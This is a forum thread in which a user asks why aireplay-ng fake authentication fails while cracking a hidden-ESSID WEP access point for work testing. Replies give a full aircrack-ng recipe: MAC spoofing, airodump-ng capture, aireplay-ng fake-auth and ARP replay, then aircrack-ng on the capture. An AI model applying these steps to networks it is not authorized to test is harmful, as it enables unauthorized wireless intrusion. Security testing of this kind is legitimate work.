WEP Crack Aireplay-ng

[kiloraw]

First i must say, wonderful job on the vol. 4. I think going to Ubuntu to will be well worth it, sucks for the guru's right now, but like I said it will be worth it.

As for my problem:
Scenario:
At work, trying to crack a AP WEP. I will have to do this alot more, since it will be my job to test the security of wireless AP, which will have WPA2. Trying to crack WEP now, for knowledge and seems logical. The AP has know clients, and the ESSID is not broadcasted. I decided to ask what was the AP's ESSID for my co-worker, so that I could troubleshoot, if it was a user error or not.

Card: 3945 iwl

airmon-ng
airmon-ng stop (interface)
ifconfig (interface) down
macchanger --mac 00:11:22:33:44:55 (interface)
airmon-ng start (interface)

airodump-ng (interface)
airodump-ng -c (channel) -w (file name) --bssid (bssid) (interface)


aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)

The command above is were i get stuck, aircrack tutorial says to "Do not proceed to the next step until you have the fake authentication running correctly."

The terminal comes back and states
Sending Authentication Request (shared) [ACK]
Authentication 1/2 successful
Sending encrypted challenge
Attack was unsuccessful
Then gives me a list of reason's why it did not work.


NEVERMIND this post....Figured it out.....You have to at least have prior data to crack WEP
duh://forums.remote-exploit.org/wireless/6535-wep-cracking-no-clients-no-ssid.html
I read the forum discussion really cleared up alot. I recommend to all future newbs(including myself), to really read the aircrack site.
Just to make sure and please someone post if this is true
"The tutorials are about the situation when you see no client :
hxxp://www.aircrack-ng.org/doku.php?...ith_no_clients
but to do the fragmentation you need the WEP encrypted data thus either it is from previous session or from a nonvisible client, as there is no data obtain from fakeauth. When you read any tutorial look at the MAC's in collected packets used to frag attack.
LAN client can seIf you have no client connected ( wlan or lan ) you have no data to collect thus cannot attack the AP unless you have previously collected data.
nd data through wireless when addressing wireless client"

[Archangel-Amael]

This is not a how-to or tutorial Please post in the correct section of the forums.

[halfdone]

Well I do WEP like this

Code:

    airmon-ng stop wlan0
    airmon-ng start wlan0
    "Ill be using mon0 (its now in monitor mode)"

    airodump-ng mon0 -w /tmp/WEP --channel (AP c hannel) --bssid (AP bssid)

NEW CONSOLE
    aireplay-ng -1 0 -a bssid (AP bssid) mon0

NEW CONSOLE
    aireplay-ng -3 -b (AP bssid) mon0
 
Wait untill the number in newiest console is over 30000 (the second number)
 Then Stop all of these
Then
 aircrack-ng /tmp/WEP-01.cap

Here is a quide
http://www.aircrack-ng.org/doku.php?...ith_no_clients

Yes I use No clients WEP hack even if ther is clients

[wMw__]

You need fake auth with shared key...

Shared key can be hooked when client connect to AP...
To hook shared key u can use airodump-ng, and wait unti someone connect

Then u have to fake auth